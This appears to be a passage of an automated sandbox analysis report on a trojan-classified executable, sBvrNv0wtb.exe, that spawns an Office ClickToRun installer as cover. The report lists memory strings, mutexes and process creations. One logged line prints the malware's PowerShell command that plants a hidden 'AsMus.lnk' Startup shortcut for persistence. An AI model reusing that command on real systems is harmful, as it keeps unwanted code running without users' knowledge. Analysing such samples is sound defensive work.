00000003.00000003.1389651071.0000000003E8C000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393510255.000000000561D000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2013075406.00000248C2C06000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2055774494.00000248C2C53000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1949642856.00000248C2BFF000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015326352.00000248C2C4C000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://webshell.suite.office.com
    Source: 872C.tmp, 00000003.00000003.1430514920.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394034884.0000000005621000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430912671.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393016019.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392840202.000000000560D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431809017.000000000561D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392770568.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393510255.000000000561D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://webshell.suite.office.com6C
    Source: 872C.tmp, 00000003.00000003.1430514920.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394034884.0000000005621000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430912671.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393016019.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392840202.000000000560D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431809017.000000000561D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392770568.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393510255.000000000561D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://webshell.suite.office.com=
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://webshell.suite.office.comBearer
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://webshell.suite.office.comhttps://login.windows.net/common/oauth2/authorizeW
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393114083.0000000005589000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://word-edit.officeapps.live.com/we/rrdiscovery.ashxed
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393114083.0000000005589000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://word-edit.officeapps.live.com/we/rrdiscovery.ashxrings5P
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios3
    Source: 872C.tmp, 00000003.00000003.1430514920.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430912671.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393016019.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392840202.000000000560D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431809017.000000000561D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392770568.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393510255.000000000561D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wordcs.officeapps.live.com/wordauto/wordautomation.svc/wordautomationl
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393114083.0000000005589000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wordcs.officeapps.live.com/wrdps/wordprint.svc/wrdprint
    Source: 872C.tmp, 00000003.00000003.1430039742.0000000003F71000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394736534.0000000003F77000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394452880.0000000003F70000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394188424.0000000005646000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393016019.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005636000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394302183.0000000003F58000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392489428.0000000005645000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392840202.000000000560D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393427760.0000000005645000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392770568.0000000005603000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1950235004.00000248C3189000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C318A000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1678127398.00000248C317E000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2014742266.00000248C3179000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000002.2060694156.00000248C31D5000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2040240300.00000248C31D5000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2013432377.00000248C3169000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wus2.contentsync.
    Source: 872C.tmp, 00000003.00000003.1430039742.0000000003F71000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394736534.0000000003F77000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394452880.0000000003F70000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394302183.0000000003F58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wus2.contentsync.onenote.com/contentsync/v1
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393595398.0000000003D26000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392408338.0000000003D27000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394188424.0000000005646000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393016019.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005636000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430994473.0000000003CD9000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392489428.0000000005645000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392840202.000000000560D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392280337.0000000003D26000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393427760.0000000005645000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392770568.0000000005603000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2052379122.00000248C2CF4000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2052051790.00000248C2CEB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wus2.pagecontentsync.
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.onenote.com/api/v1.0/me/notes/classnotebooksks
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.onenote.com/officeaddins/accessibilitycheckerer
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.onenote.com/officeaddins/insertonlinepicturere1
    Source: 872C.tmp, 00000003.00000003.1430039742.0000000003F71000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394736534.0000000003F77000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394452880.0000000003F70000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394302183.0000000003F58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.onenote.com/onaugmentation/clipperDomEnhancer/v1.0/0/
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.onenote.com/onaugmentation/clipperextract/v1.0/0/
    Source: 872C.tmp, 00000003.00000003.1430039742.0000000003F71000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394736534.0000000003F77000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394452880.0000000003F70000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394302183.0000000003F58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.onenote.com/sync/v1/attachment/GetMissingAttachmentIdsds
    Source: 872C.tmp, 00000003.00000003.1389030539.0000000003CF3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388768349.0000000003CD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.verisign.
    Source: unknownNetwork traffic detected: HTTP traffic on port 54619 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54619
    Source: unknownNetwork traffic detected: HTTP traffic on port 54614 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54614
    Source: unknownHTTPS traffic detected: 13.107.246.67:443 -> 192.168.2.6:54614 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 13.107.246.67:443 -> 192.168.2.6:54619 version: TLS 1.2
    Source: sBvrNv0wtb.exe, 00000000.00000003.1320415962.0000019728184000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: RegisterRawInputDevicesmemstr_af68b8c1-1
    Source: C2RINTL.ko-kr.dll.6.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
    Source: C2RINTL.ko-kr.dll.6.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
    Source: AppvIsvSubsystems64_arm64x.dll.6.drStatic PE information: Number of sections : 13 > 10
    Source: AppvIsvSubsystems64.dll.6.drStatic PE information: Number of sections : 11 > 10
    Source: sBvrNv0wtb.exeStatic PE information: Number of sections : 11 > 10
    Source: 918D.tmp.0.drStatic PE information: Number of sections : 11 > 10
    Source: api-ms-win-crt-math-l1-1-0.dll.6.drStatic PE information: No import functions for PE file found
    Source: api-ms-win-crt-time-l1-1-0.dll.6.drStatic PE information: No import functions for PE file found
    Source: api-ms-win-crt-convert-l1-1-0.dll.6.drStatic PE information: No import functions for PE file found
    Source: C2RINTL.nl-nl.dll.6.drStatic PE information: No import functions for PE file found
    Source: C2RINTL.lv-lv.dll.6.drStatic PE information: No import functions for PE file found
    Source: C2RINTL.fr-fr.dll.6.drStatic PE information: No import functions for PE file found
    Source: api-ms-win-crt-string-l1-1-0.dll.6.drStatic PE information: No import functions for PE file found
    Source: C2RINTL.de-de.dll.6.drStatic PE information: No import functions for PE file found
    Source: C2RINTL.ja-jp.dll.6.drStatic PE information: No import functions for PE file found
    Source: C2RINTL.en-gb.dll.6.drStatic PE information: No import functions for PE file found
    Source: C2RINTL.pt-pt.dll.6.drStatic PE information: No import functions for PE file found
    Source: api-ms-win-core-file-l1-2-0.dll.6.drStatic PE information: No import functions for PE file found
    Source: C2RINTL.da-dk.dll.6.drStatic PE information: No import functions for PE file found
    Source: api-ms-win-crt-process-l1-1-0.dll.6.drStatic PE information: No import functions for PE file found
    Source: C2RINTL.hi-in.dll.6.drStatic PE information: No import functions for PE file found
    Source: api-ms-win-crt-heap-l1-1-0.dll.6.drStatic PE information: No import functions for PE file found
    Source: C2RINTL.ko-kr.dll.6.drStatic PE information: No import functions for PE file found
    Source: api-ms-win-crt-private-l1-1-0.dll.6.drStatic PE information: No import functions for PE file found
    Source: C2RINTL.el-gr.dll.6.drStatic PE information: No import functions for PE file found
    Source: C2RINTL.en-us.dll.6.drStatic PE information: No import functions for PE file found
    Source: C2RINTL.sr-latn-rs.dll.6.drStatic PE information: No import functions for PE file found
    Source: api-ms-win-crt-filesystem-l1-1-0.dll.6.drStatic PE information: No import functions for PE file found
    Source: C2RINTL.pl-pl.dll.6.drStatic PE information: No import functions for PE file found
    Source: C2RINTL.sk-sk.dll.6.drStatic PE information: No import functions for PE file found
    Source: C2RINTL.uk-ua.dll.6.drStatic PE information: No import functions for PE file found
    Source: api-ms-win-crt-locale-l1-1-0.dll.6.drStatic PE information: No import functions for PE file found
    Source: C2RINTL.cs-cz.dll.6.drStatic PE information: No import functions for PE file found
    Source: C2RINTL.tr-tr.dll.6.drStatic PE information: No import functions for PE file found
    Source: C2RINTL.ru-ru.dll.6.drStatic PE information: No import functions for PE file found
    Source: C2RINTL.ms-my.dll.6.drStatic PE information: No import functions for PE file found
    Source: C2RINTL.kk-kz.dll.6.drStatic PE information: No import functions for PE file found
    Source: api-ms-win-crt-runtime-l1-1-0.dll.6.drStatic PE information: No import functions for PE file found
    Source: api-ms-win-crt-multibyte-l1-1-0.dll.6.drStatic PE information: No import functions for PE file found
    Source: C2RINTL.bg-bg.dll.6.drStatic PE information: No import functions for PE file found
    Source: api-ms-win-crt-conio-l1-1-0.dll.6.drStatic PE information: No import functions for PE file found
    Source: C2RINTL.it-it.dll.6.drStatic PE information: No import functions for PE file found
    Source: C2RINTL.zh-tw.dll.6.drStatic PE information: No import functions for PE file found
    Source: C2RINTL.nb-no.dll.6.drStatic PE information: No import functions for PE file found
    Source: C2RINTL.fi-fi.dll.6.drStatic PE information: No import functions for PE file found
    Source: C2RINTL.sl-si.dll.6.drStatic PE information: No import functions for PE file found
    Source: C2RINTL.es-mx.dll.6.drStatic PE information: No import functions for PE file found
    Source: C2RINTL.lt-lt.dll.6.drStatic PE information: No import functions for PE file found
    Source: C2RINTL.zh-cn.dll.6.drStatic PE information: No import functions for PE file found
    Source: C2RINTL.th-th.dll.6.drStatic PE information: No import functions for PE file found
    Source: C2RINTL.ar-sa.dll.6.drStatic PE information: No import functions for PE file found
    Source: C2RINTL.fr-ca.dll.6.drStatic PE information: No import functions for PE file found
    Source: C2RINTL.et-ee.dll.6.drStatic PE information: No import functions for PE file found
    Source: api-ms-win-crt-environment-l1-1-0.dll.6.drStatic PE information: No import functions for PE file found
    Source: api-ms-win-crt-stdio-l1-1-0.dll.6.drStatic PE information: No import functions for PE file found
    Source: C2RINTL.es-es.dll.6.drStatic PE information: No import functions for PE file found
    Source: C2RINTL.hu-hu.dll.6.drStatic PE information: No import functions for PE file found
    Source: C2RINTL.sv-se.dll.6.drStatic PE information: No import functions for PE file found
    Source: C2RINTL.he-il.dll.6.drStatic PE information: No import functions for PE file found
    Source: C2RINTL.hr-hr.dll.6.drStatic PE information: No import functions for PE file found
    Source: C2RINTL.id-id.dll.6.drStatic PE information: No import functions for PE file found
    Source: api-ms-win-core-file-l2-1-0.dll.6.drStatic PE information: No import functions for PE file found
    Source: api-ms-win-core-timezone-l1-1-0.dll.6.drStatic PE information: No import functions for PE file found
    Source: api-ms-win-core-localization-l1-2-0.dll.6.drStatic PE information: No import functions for PE file found
    Source: api-ms-win-core-synch-l1-2-0.dll.6.drStatic PE information: No import functions for PE file found
    Source: C2RINTL.vi-vn.dll.6.drStatic PE information: No import functions for PE file found
    Source: api-ms-win-crt-utility-l1-1-0.dll.6.drStatic PE information: No import functions for PE file found
    Source: api-ms-win-core-processthreads-l1-1-1.dll.6.drStatic PE information: No import functions for PE file found
    Source: api-ms-win-core-xstate-l2-1-0.dll.6.drStatic PE information: No import functions for PE file found
    Source: C2RINTL.pt-br.dll.6.drStatic PE information: No import functions for PE file found
    Source: C2RINTL.ro-ro.dll.6.drStatic PE information: No import functions for PE file found
    Source: sBvrNv0wtb.exe, 00000000.00000003.1314372768.00000197269B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBootstrapper.exeB vs sBvrNv0wtb.exe
    Source: sBvrNv0wtb.exe, 00000000.00000002.1354145817.00007FF61FFC5000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameBootstrapper.exeB vs sBvrNv0wtb.exe
    Source: sBvrNv0wtb.exe, 00000000.00000003.1320415962.000001972884E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBootstrapper.exeB vs sBvrNv0wtb.exe
    Source: sBvrNv0wtb.exe, 00000000.00000003.1347329405.0000019727EA9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBootstrapper.exeB vs sBvrNv0wtb.exe
    Source: classification engineClassification label: mal48.troj.evad.winEXE@15/533@1/2
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\UpdatesJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\92D9D3BA-E7B7-46A5-889B-6A458BDC8968Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5644:120:WilError_03
    Source: C:\Windows\System32\OpenWith.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2752:120:WilError_03
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpMutant created: \Sessions\1\BaseNamedObjects\Local\2BF388D5-6F8C-40A0-A7EE-996D005C4E14_Office16
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpMutant created: \Sessions\1\BaseNamedObjects\Local\OfficeSetupBootstrapper
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpMutant created: \Sessions\1\BaseNamedObjects\Office.16.916BB0BF-2D21-4499-83C7-555DB4C3F8E8
    Source: C:\Users\user\AppData\Local\Temp\918D.tmpMutant created: \Sessions\1\BaseNamedObjects\AsMus
    Source: C:\Users\user\Desktop\sBvrNv0wtb.exeFile created: C:\Users\user\AppData\Local\Temp\872C.tmpJump to behavior
    Source: sBvrNv0wtb.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Users\user\Desktop\sBvrNv0wtb.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: sBvrNv0wtb.exe, 00000000.00000003.1320415962.0000019728184000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000002.00000000.1320044762.000000000142B000.00000002.00000001.01000000.00000005.sdmp, 872C.tmp, 00000003.00000000.1321361371.000000000142B000.00000002.00000001.01000000.00000005.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
    Source: sBvrNv0wtb.exe, 00000000.00000003.1320415962.0000019728184000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000002.00000000.1320044762.000000000142B000.00000002.00000001.01000000.00000005.sdmp, 872C.tmp, 00000003.00000000.1321361371.000000000142B000.00000002.00000001.01000000.00000005.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
    Source: unknownProcess created: C:\Users\user\Desktop\sBvrNv0wtb.exe "C:\Users\user\Desktop\sBvrNv0wtb.exe"
    Source: C:\Users\user\Desktop\sBvrNv0wtb.exeProcess created: C:\Users\user\AppData\Local\Temp\872C.tmp C:\Users\user\AppData\Local\Temp\872C.tmp
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpProcess created: C:\Users\user\AppData\Local\Temp\872C.tmp 872C.tmp RELAUNCHED
    Source: C:\Users\user\Desktop\sBvrNv0wtb.exeProcess created: C:\Users\user\AppData\Local\Temp\918D.tmp C:\Users\user\AppData\Local\Temp\918D.tmp
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpProcess created: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe OfficeClickToRun.exe platform=x86 culture=en-us productstoadd=O365HomePremRetail.16_en-us_x-none cdnbaseurl=http://officecdn.microsoft.com/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60 baseurl=http://officecdn.microsoft.com/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60 version=16.0.18526.20168 mediatype=CDN sourcetype=CDN O365HomePremRetail.excludedapps=groove bitnessmigration=False deliverymechanism=492350f6-3a01-4f97-b9c0-c7c6ddf67d60 flt.useoutlookshareaddon=unknown flt.useofficehelperaddon=unknown uninstallcentennial=True scenario=CLIENTUPDATE
    Source: C:\Users\user\AppData\Local\Temp\918D.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command " $StartupFolder = [System.Environment]::GetFolderPath('Startup') $ExePath = 'C:\Users\Public\Music\script\918D.tmp' $ShortcutPath = Join-Path -Path $StartupFolder -ChildPath 'AsMus.lnk' $WScriptShell = New-Object -ComObject WScript.Shell $Shortcut = $WScriptShell.CreateShortcut($ShortcutPath) $Shortcut.TargetPath = $ExePath $Shortcut.WorkingDirectory = Split-Path -Parent $ExePath $Shortcut.WindowStyle = 7 $Shortcut.Description = 'AsMus' $Shortcut.Save() "
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: unknownProcess created: C:\Windows\System32\OpenWith.exe C:\Windows\system32\OpenWith.exe -Embedding
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpProcess created: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe OfficeClickToRun.exe platform=x86 culture=en-us productstoadd=O365HomePremRetail.16_en-us_x-none cdnbaseurl.16=http://officecdn.microsoft.com/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60 baseurl.16=http://officecdn.microsoft.com/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60 version.16=16.0.18526.20168 mediatype.16=CDN sourcetype.16=CDN O365HomePremRetail.excludedapps.16=groove bitnessmigration=False deliverymechanism=492350f6-3a01-4f97-b9c0-c7c6ddf67d60 flt.useoutlookshareaddon=unknown flt.useofficehelperaddon=unknown uninstallcentennial=True
    Source: C:\Users\user\Desktop\sBvrNv0wtb.exeProcess created: C:\Users\user\AppData\Local\Temp\872C.tmp C:\Users\user\AppData\Local\Temp\872C.tmpJump to behavior
    Source: C:\Users\user\Desktop\sBvrNv0wtb.exeProcess created: C:\Users\user\AppData\Local\Temp\918D.tmp C:\Users\user\AppData\Local\Temp\918D.tmpJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpProcess created: C:\Users\user\AppData\Local\Temp\872C.tmp 872C.tmp RELAUNCHEDJump to behavior
